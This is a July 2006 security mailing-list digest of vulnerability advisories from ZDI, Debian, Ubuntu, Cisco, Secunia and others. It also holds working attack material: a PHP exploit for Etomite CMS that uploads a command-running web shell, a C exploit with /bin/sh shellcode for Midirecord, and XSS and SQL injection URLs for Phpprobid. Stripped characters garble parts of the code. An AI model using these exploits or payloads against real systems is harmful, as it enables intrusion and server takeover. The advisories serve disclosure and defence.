http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
TSRT-06-04: eIQnetworks Enterprise Security Analyzer Topology Server Buffer Overflow Vulnerability
TSRT-06-04: eIQnetworks Enterprise Security Analyzer Topology Server Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/TSRT-06-04.html July 25, 2006 -- CVE ID: CVE-2006-3838 -- Affected Vendor: eIQnetworks -- Affected Products: eIQnetworks Enterprise Security Analyzer Astaro Report Manager (OEM) Fortinet FortiReporter (OEM) iPolicy Security Reporter (OEM) SanMina Viking Multi-Log Manager (OEM) Secure Computing G2 Security Reporter (OEM) Top Layer Network Security Analyzer (OEM) -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since July 24, 2006 by Digital Vaccine protection filter ID 4500. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of eIQnetworks Enterprise Security Analyzer. Authentication is not required to exploit this vulnerability. The specific flaw exists within Topology.exe, which binds by default to TCP port 10628. During the processing of long prefixes to the GUIADDDEVICE, ADDDEVICE, or DELETEDEVICE command, a stack based buffer overflow occurs. -- Vendor Response: eIQnetworks has issued an update to correct this vulnerability. More details can be found at: http://www.eiqnetworks.com/products/enterprisesecurity/ EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf -- Disclosure Timeline: 2006.05.10 - Vulnerability reported to vendor 2006.07.24 - Digital Vaccine released to TippingPoint customers 2006.07.25 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Cody Pierce, TippingPoint Security Research Team. -- About the TippingPoint Security Research Team (TSRT): The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at: http://www.tippingpoint.com/security The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service.
TSRT-06-03: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerabilities
TSRT-06-03: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerabilities http://www.zerodayinitiative.com/advisories/TSRT-06-03.html July 25, 2006 -- CVE ID: CVE-2006-3838 -- Affected Vendor: eIQnetworks -- Affected Products: eIQnetworks Enterprise Security Analyzer Astaro Report Manager (OEM) Fortinet FortiReporter (OEM) iPolicy Security Reporter (OEM) SanMina Viking Multi-Log Manager (OEM) Secure Computing G2 Security Reporter (OEM) Top Layer Network Security Analyzer (OEM) -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since July 24, 2006 by Digital Vaccine protection filter ID 4319. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of eIQnetworks Enterprise Security Analyzer. Authentication is not required to exploit this vulnerability. The flaw specifically exists within the Syslog daemon, syslogserver.exe, during the processing of long arguments passed through various commands on TCP port 10617. The following commands are known to be affected: DELTAINTERVAL LOGFOLDER DELETELOGS FWASERVER SYSLOGPUBLICIP GETFWAIMPORTLOG GETFWADELTA DELETERDEPDEVICE COMPRESSRAWLOGFILE GETSYSLOGFIREWALLS ADDPOLICY EDITPOLICY The majority of the above cases result in a stack overflow and are trivial to exploit. -- Vendor Response: eIQnetworks has issued an update to correct this vulnerability. More details can be found at: http://www.eiqnetworks.com/products/enterprisesecurity/ EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf -- Disclosure Timeline: 2006.05.10 - Vulnerability reported to vendor 2006.07.24 - Digital Vaccine released to TippingPoint customers 2006.07.25 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Cody Pierce, TippingPoint Security Research Team. -- About the TippingPoint Security Research Team (TSRT): The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at: http://www.tippingpoint.com/security The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service.
[SECURITY] [DSA 1125-1] New drupal packages fix execution of arbitrary web script code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1125-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 26th, 2006 http://www.debian.org/security/faq - -- Package: drupal Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-2742 CVE-2006-2743 CVE-2006-2831 CVE-2006-2832 CVE-2006-2833 Debian Bug : 368835 Several remote vulnerabilities have been discovered in the Drupal web site platform, which may lead to the execution of arbitrary web script. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-2742 A SQL injection vulnerability has been discovered in the count and from variables of the database interface. CVE-2006-2743 Multiple file extensions were handled incorrectly if Drupal ran on Apache with mod_mime enabled. CVE-2006-2831 A variation of CVE-2006-2743 was adressed as well. CVE-2006-2832 A Cross-Site-Scripting vulnerability in the upload module has been discovered. CVE-2006-2833 A Cross-Site-Scripting vulnerability in the taxonomy module has been discovered. For the stable distribution (sarge) these problems have been fixed in version 4.5.3-6.1sarge1. For the unstable distribution (sid) these problems have been fixed in version 4.5.8-1.1. We recommend that you upgrade your drupal packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.1sarge1.dsc Size/MD5 checksum: 625 8323ad6164c5beb6e9c7631272fbaee8 http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.1sarge1.diff.gz Size/MD5 checksum:83802 35863480a9da96adbe6731b014d204c8 http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3.orig.tar.gz Size/MD5 checksum: 471540 bf093c4c8aca7bba62833ea1df35702f Architecture independent components: http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.1sarge1_all.deb Size/MD5 checksum: 506884 e4cdba2730662752d8f83fc101ab58a5 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEx9wrXm3vHE4uyloRAsWtAKDoQf4DhL4eqpPLmDuifZ/Rh4h61gCggvrQ zwceOEHQ/r/GyRU2L5X9vd8= =V7nw -END PGP SIGNATURE-
Cisco VPN Concentrator IKE resource exhaustion DoS Advisory
Cisco VPN Concentrator IKE resource exhaustion DoS Advisory 1. Overview NTA Monitor discovered a denial of service vulnerability in the Cisco VPN 3000 series concentrator products while performing a VPN security test for a customer in July 2005. The vulnerability affects Phase-1 of the IKE protocol. Both Main Mode and Aggressive Mode over both UDP and TCP transports are affected. The vulnerability allows an attacker to exhaust the IKE resources on a VPN concentrator by sending a high rate of IKE requests, which will prevent valid clients from connected or re-keying. The attack does not require a high bandwidth, so one attacker could potentially target many concentrators. This mechanism behind this vulnerability is similar to the well-known TCP SYN flood vulnerability. 2. Vulnerability Details The vulnerability allows an attacker to exhaust the IKE resources on a remote VPN concentrator by starting new IKE sessions faster than the concentrator expires them from its queue. By doing this, the attacker fills up the concentrator's queue, which prevents it from handling valid IKE requests. The exploit involves sending IKE Phase-1 packets containing an acceptable transform. It is not necessary to have valid credentials in order to exploit this vulnerability, as the problem occurs before the authentication stage. The vulnerability affects both Main Mode and Aggressive Mode, and both normal IKE over UDP and Cisco proprietary TCP-encapsulated IKE. In order to exploit the vulnerability, the attacker needs to send IKE packets at a rate which exceeds the Concentrator's IKE session expiry rate. Tests show that the target concentrator starts to be affected at a rate of 2 packets per second, and is becomes unusable at 10 packets per second. As a minimal Main Mode packet with a single transform is 112 bytes long, 10 packets per second corresponds to a data rate of slightly less than 9,000 bits per second. The concentrator will remain unable to process IKE requests as long as the flow of packets continues. Once the flow stops, the concentrator will return to normal operation as the negotiation queue drains. It is not normally possible to block public inbound access to the IKE service on the VPN concentrator, because it is required for remote access IPsec operation. As IKE normally uses the UDP transport protocol, the attacker may forge the packet's source IP address to avoid identification, or to prevent the victim from blocking the traffic with ingress filtering. In addition, IDS/IPS systems will probably not be able to detect the attack, because the packets are valid IKE packets. It is possible for attackers to detect and fingerprint Cisco VPN concentrators using the IKE fingerprinting techniques that we have previously published in VPN security white papers. Therefore users should not assume that their concentrator is invisible just because it's not published in the DNS and is not running any TCP services. The symptoms are that the target concentrator won't respond to IKE requests from any source when all the negotiation slots are filled. This means that new clients will be unable to connect, and Phase-1 re-keying attempts will fail. It is not known if Phase-2 re-keying is also affected. Traffic over existing VPN tunnels should not be affected until they need to re-key. The mechanism behind this vulnerability is similar to that behind the well-known TCP SYN flood issue. In both cases the target system has a stateful mechanism for recording outstanding negotiations, uses a fixed-size list to store negotiations in progress, and does not require any authentication in order to start a negotiation. 3. Example We are not planning to release examples of how to exploit this vulnerability until it has been addressed and users have had an opportunity to apply the fix or workaround. 4. Affected Versions The issue is believed to affect all models of Cisco VPN 3000 Concentrator: 3005, 3015, 3020, 3030, 3060 and 3080. It is suspected that other cisco products that support IKE may also be affected, but this has not been confirmed. 5. Solution There is no known fix or workaround at this time. 6. Timeline The vulnerability was first discovered on 4th July 2005, and was reported to Cisco's security team (PSIRT) the same day. Cisco responded on 9th August 2005, but no further progress has been made. 7. References NTA Monitor advisory http://www.nta-monitor.com/posts/2006/07/cisco-concentrator-dos.html Roy Hills NTA Monitor Ltd -- Roy HillsTel: +44 1634 721855 NTA Monitor Ltd FAX: +44 1634 721844 14 Ashford House, Beaufort Court, Medway City Estate, Email: [EMAIL PROTECTED] Rochester, Kent ME2 4FA, UK WWW: http://www.nta-monitor.com/
Etomite CMS = 0.6.1 'rfiles.php' remote command execution
#!/usr/bin/php -q -d short_open_tag=on ? echo Etomite CMS = 0.6.1 'rfiles.php' remote command execution\r\n; echo by rgod [EMAIL PROTECTED]; echo site: http://retrogod.altervista.org\r\n;; echo google dork: \Content managed by the Etomite Content Management System\\r\n\r\n; /* works regardless of php.ini settings */ if ($argc4) { echo Usage: php .$argv[0]. host path cmd OPTIONS\r\n; echo host: target server (ip/hostname)\r\n; echo path: path to etomite\r\n; echo Options:\r\n; echo-p[port]:specify a port other than 80\r\n; echo-P[ip:port]: specify a proxy\r\n; echo Examples:\r\n; echo php .$argv[0]. localhost /etomite/ \r\n; echo php .$argv[0]. localhost / -P1.1.1.1:80\r\n; die; } /* software site: http://www.etomite.org/ explaination: if you can call directly rfiles.php script you can upload an image file, then you can rename it with .php extension, so you launch commands... */ error_reporting(0); ini_set(max_execution_time,0); ini_set(default_socket_timeout,5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i=strlen($string)-1; $i++) { if ((ord($string[$i]) = 32 ) | (ord($string[$i]) 126 )) {$result.= .;} else {$result.= .$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.= .dechex(ord($string[$i]));} else {$exa.= 0.dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.=\r\n; $exa.=\r\n;} } return $exa.\r\n.$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo Connecting to .$parts[0].:.$parts[1]. proxy...\r\n; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo \r\n.$html; } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 10); } $host=$argv[1]; $path=$argv[2]; $cmd=; $port=80; $proxy=; for ($i=3; $i=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp-p) and ($temp-P)) {$cmd.= .$argv[$i];} if ($temp==-p) { $port=str_replace(-p,,$argv[$i]); } if ($temp==-P) { $proxy=str_replace(-P,,$argv[$i]); } } if (($path[0]'/') or ($path[strlen($path)-1]'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} srand(make_seed()); $anumber = rand(1,999); $valid = array('gif', 'jpg', 'jpeg', 'png'); for ($i=0; $icount($valid); $i++) { $data='-7d6341a4e0c5a Content-Disposition: form-data; name=lang en -7d6341a4e0c5a Content-Disposition: form-data; name=param upload -7d6341a4e0c5a Content-Disposition: form-data; name=flist 1 -7d6341a4e0c5a Content-Disposition: form-data; name=cimg -7d6341a4e0c5a Content-Disposition: form-data; name=ilibs / -7d6341a4e0c5a Content-Disposition: form-data; name=randomParam w=150h=150zc=1 -7d6341a4e0c5a Content-Disposition: form-data; name=popClassName default -7d6341a4e0c5a Content-Disposition: form-data; name=popTitle -7d6341a4e0c5a Content-Disposition: form-data; name=in_srcnew -7d6341a4e0c5a Content-Disposition: form-data; name=in_dirnew -7d6341a4e0c5a Content-Disposition: form-data; name=nfile[]; filename=suntzu'.$anumber.'.php.'.$valid[$i].' Content-Type: ?php set_time_limit(0);echo my_delim;passthru($_SERVER[HTTP_CLIENT_IP]);echo my_delim;? -7d6341a4e0c5a Content-Disposition: form-data; name=chkThumbSize[0] 0 -7d6341a4e0c5a Content-Disposition: form-data; name=selRotate -7d6341a4e0c5a Content-Disposition: form-data; name=pr_title -7d6341a4e0c5a Content-Disposition: form-data; name=pr_alt -7d6341a4e0c5a Content-Disposition: form-data; name=pr_class default -7d6341a4e0c5a Content-Disposition: form-data; name=pr_align
[ECHO_ADV_41$2006] BufferOverflow in Midirecord2
ECHO_ADV_41$2006 --- [ECHO_ADV_41$2006] BufferOverflow in Midirecord2 --- Author : Dedi Dwianto Date : July, 25th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv41-theday-2006.txt Exploitation : Local Critical Lvl : High --- Affected software description: ~~ Application : Midirecord version : 2 URL : http://tuma.stc.cx/progs.php Description : Midirecord is a simple command-line application to record a MIDI file with your MIDI keyboard. It also features automatic recording to a MIDI file when you play electric piano, and thus it may be used as a recording daemon. --- Vulnerability: The function daemon in affected by a bufferoverflow which could allow an attacker to execute malicious code from local. The problem is caused by the copyung of a string of max 10 bytes in the filename buffer of only 50 bytes. --midirecord.cc- void daemon(FILE* fin) { char filename[50]; printf(Waiting for note-on event.\n); while(cont) { unsigned char status; fread(status, 1, 1, fin); // read status if(status4 == 0x9) { get_datestr(filename); printf(Starting to record to %s.\n,filename); recordmidi(fin, filename); if(cont) printf(Finished. Starting to wait for note-on event.\n); } } } -- POC: $gdb midirecord GNU gdb 6.3-debian Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type show copying to see the conditions. There is absolutely no warranty for GDB. Type show warranty for details. This GDB was configured as i486-linux-gnu...Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1. (gdb) r `perl -e 'print A x 1'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /tmp/midirecord2c/midirecord `perl -e 'print A x 1'` Waiting for note-on event. Program received signal SIGSEGV, Segmentation fault. 0xb7dcb4b0 in fread () from /lib/tls/i686/cmov/libc.so.6 (gdb) ---Exploit Code--- /* Succesfull Exploit in Ubuntu Breezey */ #include stdio.h #include string.h #include unistd.h #define BUFSIZE 225 #define ALIGNMENT 1 int main(int argc, char **argv ) { char shellcode[]= \x6a\x17\x58\x31\xdb\xcd\x80 \x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80; if(argc 2) { fprintf(stderr, Use : %s path_to_vuln\n, argv[0]); return 0; } char *env[] = {shellcode, NULL}; char buf[BUFSIZE]; int i; int *ap = (int *)(buf + ALIGNMENT); int ret = 0xbffa - strlen(shellcode) - strlen(argv[1]); for (i = 0; i BUFSIZE - 4; i += 4) *ap++ = ret; execle(argv[1], /dev/midi1, buf, NULL, env); } --- Shoutz: ~~~ ~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous ~ My Lovely Jessy ~ [EMAIL PROTECTED] ~ #aikmel #e-c-h-o @irc.dal.net --- Contact: Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id Homepage: http://theday.echo.or.id/ [ EOF ] --
[USN-323-1] mozilla vulnerabilities
=== Ubuntu Security Notice USN-323-1 July 25, 2006 mozilla vulnerabilities CVE-2006-2775, CVE-2006-2776, CVE-2006-2777, CVE-2006-2778, CVE-2006-2779, CVE-2006-2780, CVE-2006-2781, CVE-2006-2782, CVE-2006-2783, CVE-2006-2784, CVE-2006-2785, CVE-2006-2786, CVE-2006-2787 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: mozilla-browser 2:1.7.13-0ubuntu05.04.1 mozilla-mailnews 2:1.7.13-0ubuntu05.04.1 mozilla-psm 2:1.7.13-0ubuntu05.04.1 Ubuntu 5.10: mozilla-browser 2:1.7.13-0ubuntu5.10.1 mozilla-mailnews 2:1.7.13-0ubuntu5.10.1 mozilla-psm 2:1.7.13-0ubuntu5.10.1 After a standard system upgrade you need to restart Mozilla to effect the necessary changes. Details follow: Jonas Sicking discovered that under some circumstances persisted XUL attributes are associated with the wrong URL. A malicious web site could exploit this to execute arbitrary code with the privileges of the user. (MFSA 2006-35, CVE-2006-2775) Paul Nickerson discovered that content-defined setters on an object prototype were getting called by privileged UI code. It was demonstrated that this could be exploited to run arbitrary web script with full user privileges (MFSA 2006-37, CVE-2006-2776). A similar attack was discovered by moz_bug_r_a4 that leveraged SelectionObject notifications that were called in privileged context. (MFSA 2006-43, CVE-2006-2777) Mikolaj Habryn discovered a buffer overflow in the crypto.signText() function. By tricking a user to visit a site with an SSL certificate with specially crafted optional Certificate Authority name arguments, this could potentially be exploited to execute arbitrary code with the user's privileges. (MFSA 2006-38, CVE-2006-2778) The Mozilla developer team discovered several bugs that lead to crashes with memory corruption. These might be exploitable by malicious web sites to execute arbitrary code with the privileges of the user. (MFSA 2006-32, CVE-2006-2779, CVE-2006-2780) Masatoshi Kimura discovered a memory corruption (double-free) when processing a large VCard with invalid base64 characters in it. By sending a maliciously crafted set of VCards to a user, this could potentially be exploited to execute arbitrary code with the user's privileges. (MFSA 2006-40, CVE-2006-2781) Chuck McAuley reported that the fix for CVE-2006-1729 (file stealing by changing input type) was not sufficient to prevent all variants of exploitation. (MFSA 2006-41, CVE-2006-2782) Masatoshi Kimura found a way to bypass web input sanitizers which filter out JavaScript. By inserting 'Unicode Byte-order-Mark (BOM)' characters into the HTML code (e. g. 'scr[BOM]ipt'), these filters might not recognize the tags anymore; however, Mozilla would still execute them since BOM markers are filtered out before processing the page. (MFSA 2006-42, CVE-2006-2783) Paul Nickerson noticed that the fix for CVE-2005-0752 (JavaScript privilege escalation on the plugins page) was not sufficient to prevent all variants of exploitation. (MFSA 2006-36, CVE-2006-2784) Paul Nickerson demonstrated that if an attacker could convince a user to right-click on a broken image and choose View Image from the context menu then he could get JavaScript to run on a site of the attacker's choosing. This could be used to steal login cookies or other confidential information from the target site. (MFSA 2006-34, CVE-2006-2785) Kazuho Oku discovered various ways to perform HTTP response smuggling when used with certain proxy servers. Due to different interpretation of nonstandard HTTP headers in Mozilla and the proxy server, a malicious web site can exploit this to send back two responses to one request. The second response could be used to steal login cookies or other sensitive data from another opened web site. (MFSA 2006-33, CVE-2006-2786) Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mozilla/mozilla_1.7.13-0ubuntu05.04.1.diff.gz Size/MD5: 337800 2db7b990124c6c1c1b8e9672ca5d6513 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla/mozilla_1.7.13-0ubuntu05.04.1.dsc Size/MD5: 1140 dff39e5ce49d9743de85eec224192a32 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla/mozilla_1.7.13.orig.tar.gz Size/MD5: 38788839 db906560b5abe488286ad1edc21d52b6 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla/libnspr-dev_1.7.13-0ubuntu05.04.1_amd64.deb Size/MD5: 168074
[vuln.sg] PowerArchiver DZIPS32.DLL Buffer Overflow Vulnerability
[vuln.sg] Vulnerability Research Advisory PowerArchiver DZIPS32.DLL Buffer Overflow Vulnerability by Tan Chew Keong Release Date: 2006-07-25 Summary --- A vulnerability has been found in PowerArchiver. When exploited, the vulnerability allows execution of arbitrary code when the user adds a file to a malicious ZIP archive. Tested Version -- PowerArchiver version 9.62.03 (English) Details --- http://vuln.sg/powarc962-en.html
[OpenPKG-SA-2006.014] OpenPKG Security Advisory (shiela)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security/ http://www.openpkg.org [EMAIL PROTECTED] [EMAIL PROTECTED] OpenPKG-SA-2006.014 25-Jul-2006 Package: shiela Vulnerability: arbitrary code execution OpenPKG Specific:no Affected Releases: Affected Packages: Corrected Packages: OpenPKG CURRENT = shiela-1.1.6-20051003 = shiela-1.1.7-20060725 OpenPKG 2-STABLE = shiela-1.1.6-2.20060622 = shiela-1.1.6-2.20060725 OpenPKG 2.5-RELEASE = shiela-1.1.6-2.5.0 = shiela-1.1.6-2.5.1 Description: Brian Caswell from Sourcefire discovered [0] vulnerabilities in OSSP Shiela [1], a CVS repository access control and logging extension. The vulnerabilities allow arbitrary code execution during CVS file commits if a filename is specially crafted to contain shell commands. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2006-3633 [2] to the problem. Notice: OSSP shiela might be installed as a _copy_ into your CVSROOT area. If this is the case please do not forget to update this copy after updating the OpenPKG shiela package. References: [0] http://www.sourcefire.com/services/advisories.html [1] http://www.ossp.org/pkg/tool/shiela/ [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3633 For security reasons, this advisory was digitally signed with the OpenPGP public key OpenPKG [EMAIL PROTECTED] (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org for details on how to verify the integrity of this advisory. -BEGIN PGP SIGNATURE- Comment: OpenPKG [EMAIL PROTECTED] iD8DBQFExhowgHWT4GPEy58RAqebAKDrtzC7gPTTHwmeAM1MoHUc1Ur7KgCePwzH hdc+Mfs8c6EYN858iSsuw2E= =3m7l -END PGP SIGNATURE-
Secunia Research: FileCOPA Directory Argument Handling Buffer Overflow
== Secunia Research 25/07/2006 - FileCOPA Directory Argument Handling Buffer Overflow - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software FileCOPA 1.01 released 2006-07-18. NOTE: Other versions may also be affected. == 2) Severity Rating: Moderate (High with anonymous access enabled) Impact: System compromise Where: Remote == 3) Vendor's Description of Software FileCOPA takes the hard work out of running an FTP Server. The FileCOPA FTP Server Software installs on any version of the Microsoft Windows operating system with just a few clicks of the mouse and automatically configures itself for anonymous operation. Product Link: http://www.filecopa.com/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in FileCOPA, which can be exploited by malicious users to compromise a vulnerable system. The vulnerability is caused due to an integer underflow error in the FTP service (filecpnt.exe) when processing directory arguments passed to certain FTP commands (e.g. CWD, DELE, MDTM, and MKD). This can be exploited to cause a stack-based buffer overflow by passing a specially crafted, overly long argument to one of the affected FTP commands. Successful exploitation allows execution of arbitrary code. == 5) Solution Update to version 1.01 released 2006-07-21. == 6) Time Table 21/07/2006 - Vendor notified. 21/07/2006 - Vendor response. 25/07/2006 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-3768 for the vulnerability. == 9) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-55/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Phpprobid = 5.24 XSS SQL injection Vulnerability
Phpprobid 5.24 http://www.phpprobid.com -- Cross Site Scripting (XSS) -- http://target.xx/auctionsearch.php?advsrc=;scriptalert(/EllipsisSecurityTest/)/script http://target.xx/auctionsearch.php?start=1advsrc=;scriptalert(/EllipsisSecurityTest/)/script - SQL injection - http://target.xx/viewfeedback.php?view=1'[SQL] http://target.xx/viewfeedback.php?view=allstart=1'[SQL] http://target.xx/categories.php?parent=start=orderField=itemnameorderType=1'[SQL] - Ellipsis Security http://www.ellsec.org
Re: new shell bypass safe mode
This is old safe_mode bypass. But you can only bypass safe mode in php 4.4.2 and 5.1.2 and prior. Your exploit code is just copy with little changes of http://securityreason.com/achievement_exploitalert/8 based on SecurityReason Advisory http://securityreason.com/achievement_securityalert/37 CVE:CVE-2006-1608 Regards SecurityReason